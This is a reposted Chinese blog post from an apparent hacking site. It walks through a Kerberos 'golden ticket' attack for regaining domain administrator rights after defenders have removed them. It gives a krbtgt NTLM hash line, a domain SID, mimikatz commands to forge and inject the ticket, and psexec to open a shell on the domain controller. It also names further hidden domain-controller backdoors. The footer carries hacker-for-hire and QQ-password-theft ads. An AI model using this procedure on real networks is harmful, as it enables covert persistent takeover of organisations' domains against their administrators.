渗透技术|域渗透的金之钥匙

hacker5年前黑客工具329

  最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。

  我原来发过一个微博说

  

  这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

  要重新拿回域管理员权限,首先要先知道域内的管理员有谁

  我这里的实验环境,通过截图可以看到域管理员是administrator

  我还要知道域SID是啥

  我的域SID是

  还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

  krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

  

  然后该用神器mimikatz出场了,依次执行

  mimikatz # kerberos::purge

  mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi

  mimikatz # kerberos::ptt Administrator.kiribi

  mimikatz # kerberos::tgt

  

  到现在,我们又重新拥有域管理员权限了,可以验证下

  E:\>net use \\WIN-0DKN2AS0T2G\c$

  E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd

  

  呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。

  当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。

  【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】

标签: 渗透测试

相关文章

24小时接单的黑客QQ号,被骗后找 黑客 追损的想法不靠谱,找黑客改成绩靠谱么

http://www.evilxr.com [200] WordPress[3.9.1], MetaGenerator[WordPress 3.9.1], HTTPServer[Microsoft-I...

上饶网络黑客(上饶打击网络犯罪)

上饶网络黑客(上饶打击网络犯罪)

本文导读目录: 1、什么是网络黑客??? 2、通常说的“网络黑客”具体是什么概念? 3、什么是网络黑客?黑客入侵的目的主要有哪些? 4、网络黑客的职业是什么 5、最近上饶之窗网站很难打...

一个新公众号怎么吸粉(公众号运营收费价格表)

一个新公众号怎么吸粉(公众号运营收费价格表)

涨粉、涨粉、涨粉! 曾经的江湖流传着一个传说:得粉丝者得天下。 虽然现在言论不一,但涨粉依旧是绝大多数运营者高度关心的话题。涨粉越来越难,单个粉丝获取成本也越来越高。 这是一个赤裸裸、血淋漓的事实,做...

缅甸民盟赢得联14点28邦议会过半席位

  新华社仰光11月13日电(记者车宏亮 张东强)据缅甸联邦选举委员会13日公布的数据,国务资政昂山素季领导的缅甸全国民主联盟(民盟)已赢得半数以上的联邦议会席位(含军人非选举议席),获得组建新政府、...

黑客接单app.,黑客技术盗qq密码联系方式,老婆把我拉黑名单找黑客找人

后台:manage/main.asp日前,国内最大的互联网安全公司360(NYSE:QIHU)发布了《2014年中国网站安全陈述》(以下简称《陈述》),《陈述》指出,2014年,网络安全问题出现网站缝...

额首称庆(额手称庆哪个字错了)

额首称庆(额手称庆哪个字错了) 前言:不仅答题,更是学习。让每个人都博古通今,能文能武;上知天文,下知地理,中晓人和;可九天揽月,可五洋捉鳖;前知五千年,后知八百载;运筹帷幄之中,决胜千里之外。共同...